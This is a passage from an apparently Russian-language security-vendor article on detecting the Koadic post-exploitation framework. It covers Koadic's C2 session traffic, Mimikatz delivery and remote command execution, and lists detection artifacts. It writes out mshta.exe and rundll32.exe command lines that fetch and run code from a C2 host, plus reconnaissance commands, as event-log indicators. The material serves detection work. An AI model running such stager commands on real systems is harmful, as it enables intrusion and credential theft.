ΠΏΡ€ΠΈΠΌΠ΅Ρ€ для стСйдТСра mshta.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 11. Π˜Π½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·Π°Ρ†ΠΈΡ сСссии с CnC-сСрвСром

По ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ WS ΠΎΡ‚Π²Π΅Ρ‚Π° становится понятно, Ρ‡Ρ‚ΠΎ исполнСниС происходит Ρ‡Π΅Ρ€Π΅Π· WScript.Shell, Π° ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Π΅ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE содСрТат ΠΊΠ»ΡŽΡ‡Π΅Π²ΡƒΡŽ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π°Ρ… Ρ‚Π΅ΠΊΡƒΡ‰Π΅ΠΉ сСссии. Π­Ρ‚ΠΎ пСрвая ΠΏΠ°Ρ€Π° запрос-ΠΎΡ‚Π²Π΅Ρ‚ Π² HTTP-соСдинСнии с CnC-сСрвСром. ΠŸΠΎΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ запросы связаны нСпосрСдствСнно с Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒΡŽ Π²Ρ‹Π·Ρ‹Π²Π°Π΅ΠΌΡ‹Ρ… ΠΌΠΎΠ΄ΡƒΠ»Π΅ΠΉ (ΠΈΠΌΠΏΠ»Π°Π½Ρ‚ΠΎΠ²). ВсС ΠΌΠΎΠ΄ΡƒΠ»ΠΈ Koadic Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‚ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ с Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΠΉ сСссиСй c CnC.

Mimikatz

Π’Π°ΠΊ ΠΆΠ΅, ΠΊΠ°ΠΊ CME Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ с Bloodhound, Koadic Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ с Mimikatz ΠΊΠ°ΠΊ с ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½ΠΎΠΉ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠΎΠΉ ΠΈ ΠΈΠΌΠ΅Π΅Ρ‚ нСсколько способов Π΅Π΅ запуска. НиТС прСдставлСна ΠΏΠ°Ρ€Π° запрос-ΠΎΡ‚Π²Π΅Ρ‚ для Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ ΠΈΠΌΠΏΠ»Π°Π½Ρ‚Π° Mimikatz.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 12. ΠŸΠ΅Ρ€Π΅Π΄Π°Ρ‡Π° Mimikatz Π² Koadic

МоТно Π·Π°ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, ΠΊΠ°ΠΊ измСнился Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ URI Π² запросС. Π’ Π½Π΅ΠΌ появилось Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ Ρƒ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ csrf, которая ΠΎΡ‚Π²Π΅Ρ‡Π°Π΅Ρ‚ Π·Π° Π²Ρ‹Π±Ρ€Π°Π½Π½Ρ‹ΠΉ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ. НС ΠΎΠ±Ρ€Π°Ρ‰Π°ΠΉΡ‚Π΅ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ Π½Π° Π΅Π΅ имя; всС ΠΌΡ‹ Π·Π½Π°Π΅ΠΌ, Ρ‡Ρ‚ΠΎ ΠΏΠΎΠ΄ CSRF ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ Π΄Ρ€ΡƒΠ³ΠΎΠ΅. Π’ ΠΎΡ‚Π²Π΅Ρ‚ ΠΏΡ€ΠΈΡˆΠ»ΠΎ всС Ρ‚ΠΎ ΠΆΠ΅ основноС Ρ‚Π΅Π»ΠΎ Koadic, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ добавился ΠΊΠΎΠ΄, связанный с Mimikatz. Он достаточно большой, поэтому рассмотрим ΠΊΠ»ΡŽΡ‡Π΅Π²Ρ‹Π΅ ΠΌΠΎΠΌΠ΅Π½Ρ‚Ρ‹. ΠŸΠ΅Ρ€Π΅Π΄ Π½Π°ΠΌΠΈ закодированная Π² base64 Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ° Mimikatz, сСриализованный .NET-класс, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±ΡƒΠ΄Π΅Ρ‚ Π΅Π΅ ΠΈΠ½ΠΆΠ΅ΠΊΡ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ, ΠΈ Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚Ρ‹ для запуска Mimikatz. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ выполнСния пСрСдаСтся ΠΏΠΎ сСти Π² ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΎΠΌ Π²ΠΈΠ΄Π΅.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 13. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ выполнСния Mimikatz Π½Π° ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ машинС

Exec_cmd

Π’ Koadic Ρ‚Π°ΠΊΠΆΠ΅ Π΅ΡΡ‚ΡŒ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ, способныС ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹. Π—Π΄Π΅ΡΡŒ ΠΌΡ‹ ΡƒΠ²ΠΈΠ΄ΠΈΠΌ всС Ρ‚ΠΎΡ‚ ΠΆΠ΅ ΠΌΠ΅Ρ‚ΠΎΠ΄ Π³Π΅Π½Π΅Ρ€Π°Ρ†ΠΈΠΈ URI ΠΈ Π·Π½Π°ΠΊΠΎΠΌΡ‹Π΅ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Π΅ sid ΠΈ csrf. Π’ случаС модуля exec_cmd Π² Ρ‚Π΅Π»ΠΎ добавляСтся ΠΊΠΎΠ΄, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ способСн Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ shell-ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹. НиТС ΠΏΠΎΠΊΠ°Π·Π°Π½ Ρ‚Π°ΠΊΠΎΠΉ ΠΊΠΎΠ΄, содСрТащийся Π² HTTP-ΠΎΡ‚Π²Π΅Ρ‚Π΅ CnC-сСрвСра.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 14. Код ΠΈΠΌΠΏΠ»Π°Π½Ρ‚Π° exec_cmd

ΠŸΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Π°Ρ GAWTUUGCFI со Π·Π½Π°ΠΊΠΎΠΌΡ‹ΠΌ Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ΠΎΠΌ WS Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠ° для выполнСния ΠΊΠΎΠ΄Π°. Π‘ Π΅Π΅ ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΈΠΌΠΏΠ»Π°Π½Ρ‚ Π²Ρ‹Π·Ρ‹Π²Π°Π΅Ρ‚ shell, обрабатывая Π΄Π²Π΅ Π²Π΅Ρ‚ΠΊΠΈ ΠΊΠΎΠ΄Π° β€” shell.exec с Π²ΠΎΠ·Π²Ρ€Π°Ρ‰Π΅Π½ΠΈΠ΅ΠΌ Π²Ρ‹Ρ…ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΏΠΎΡ‚ΠΎΠΊΠ° Π΄Π°Π½Π½Ρ‹Ρ… ΠΈ shell.run Π±Π΅Π· возращСния.

Koadic Π½Π΅ являСтся Ρ‚ΠΈΠΏΠΈΡ‡Π½Ρ‹ΠΌ инструмСнтом, Π½ΠΎ ΠΈΠΌΠ΅Π΅Ρ‚ свои Π°Ρ€Ρ‚Π΅Ρ„Π°ΠΊΡ‚Ρ‹, ΠΏΠΎ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ Π΅Π³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡ‚ΠΈ Π² Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½ΠΎΠΌ Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ΅:

  • особоС Ρ„ΠΎΡ€ΠΌΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ HTTP-запросов,
  • использованиС winHttpRequests API,
  • созданиС ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π° WScript.Shell Ρ‡Π΅Ρ€Π΅Π· ActiveXObject,
  • большоС исполняСмоС Ρ‚Π΅Π»ΠΎ.

Π˜Π·Π½Π°Ρ‡Π°Π»ΡŒΠ½ΠΎΠ΅ соСдинСниС ΠΈΠ½ΠΈΡ†ΠΈΠΈΡ€ΡƒΠ΅Ρ‚ стСйдТСр, поэтому появляСтся Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Ρ‚ΡŒ Π΅Π³ΠΎ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΡΡ‚ΡŒ Ρ‡Π΅Ρ€Π΅Π· события Windows. Для mshta это событиС 4688, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ Π³ΠΎΠ²ΠΎΡ€ΠΈΡ‚ ΠΎ создании процСсса с Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ΠΎΠΌ запуска:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Π’ΠΎ врСмя выполнСния Koadic ΠΌΠΎΠΆΠ½ΠΎ ΡƒΠ²ΠΈΠ΄Π΅Ρ‚ΡŒ ΠΈ Π΄Ρ€ΡƒΠ³ΠΈΠ΅ события 4688 с Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚Π°ΠΌΠΈ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΎΡ‚Π»ΠΈΡ‡Π½ΠΎ Π΅Π³ΠΎ Ρ…Π°Ρ€Π°ΠΊΡ‚Π΅Ρ€ΠΈΠ·ΡƒΡŽΡ‚:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Π’Ρ‹Π²ΠΎΠ΄Ρ‹

Π’Ρ€Π΅Π½Π΄ living off the land Π½Π°Π±ΠΈΡ€Π°Π΅Ρ‚ ΠΏΠΎΠΏΡƒΠ»ΡΡ€Π½ΠΎΡΡ‚ΡŒ срСди Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠ². Они ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ встроСнныС Π² Windows инструмСнты ΠΈ ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΡ‹ для своих Π½ΡƒΠΆΠ΄. ΠœΡ‹ Π²ΠΈΠ΄ΠΈΠΌ, ΠΊΠ°ΠΊ популярныС инструмСнты Koadic, CrackMapExec ΠΈ Impacket, ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ этому ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΡƒ, всС Ρ‡Π°Ρ‰Π΅ Π²ΡΡ‚Ρ€Π΅Ρ‡Π°ΡŽΡ‚ΡΡ Π² ΠΎΡ‚Ρ‡Π΅Ρ‚Π°Ρ… ΠΎΠ± APT. Число Ρ„ΠΎΡ€ΠΊΠΎΠ² Π½Π° GitHub Ρƒ этих инструмСнтов Ρ‚Π°ΠΊΠΆΠ΅ растСт, ΠΏΠΎΡΠ²Π»ΡΡŽΡ‚ΡΡ Π½ΠΎΠ²Ρ‹Π΅ (сСйчас ΠΈΡ… ΡƒΠΆΠ΅ ΠΎΠΊΠΎΠ»ΠΎ тысячи). Π’Ρ€Π΅Π½Π΄ Π½Π°Π±ΠΈΡ€Π°Π΅Ρ‚ ΠΏΠΎΠΏΡƒΠ»ΡΡ€Π½ΠΎΡΡ‚ΡŒ Π² силу своСй простоты: Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ Π½Π΅ Π½ΡƒΠΆΠ½Ρ‹ сторонниС инструмСнты, ΠΎΠ½ΠΈ ΡƒΠΆΠ΅ Π΅ΡΡ‚ΡŒ Π½Π° ΠΌΠ°ΡˆΠΈΠ½Π°Ρ… ΠΆΠ΅Ρ€Ρ‚Π² ΠΈ ΠΏΠΎΠΌΠΎΠ³Π°ΡŽΡ‚ ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΡ‚ΡŒ срСдства Π·Π°Ρ‰ΠΈΡ‚Ρ‹. ΠœΡ‹ сосрСдоточСны Π½Π° ΠΈΠ·ΡƒΡ‡Π΅Π½ΠΈΠΈ сСтСвого взаимодСйствия: ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ описанный Π²Ρ‹ΡˆΠ΅ инструмСнт оставляСт свои слСды Π² сСтСвом Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ΅; ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½ΠΎΠ΅ ΠΈΡ… ΠΈΠ·ΡƒΡ‡Π΅Π½ΠΈΠ΅ ΠΏΠΎΠ·Π²ΠΎΠ»ΠΈΠ»ΠΎ Π½Π°ΠΌ Π½Π°ΡƒΡ‡ΠΈΡ‚ΡŒ наш ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ PT Network Attack Discovery ΠΈΡ… ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π² ΠΈΡ‚ΠΎΠ³Π΅ ΠΏΠΎΠΌΠΎΠ³Π°Π΅Ρ‚ Ρ€Π°ΡΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚ΡŒ всю Ρ†Π΅ΠΏΠΎΡ‡ΠΊΡƒ ΠΊΠΈΠ±Π΅Ρ€ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΎΠ² с ΠΈΡ… участиСм.

Авторы:

  • Антон Π’ΡŽΡ€ΠΈΠ½, Ρ€ΡƒΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΡŒ ΠΎΡ‚Π΄Π΅Π»Π° экспСртных сСрвисов, PT Expert Security Center, Positive Technologies
  • Π•Π³ΠΎΡ€ Подмоков, экспСрт, PT Expert Security Center, Positive Technologies

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: habr.com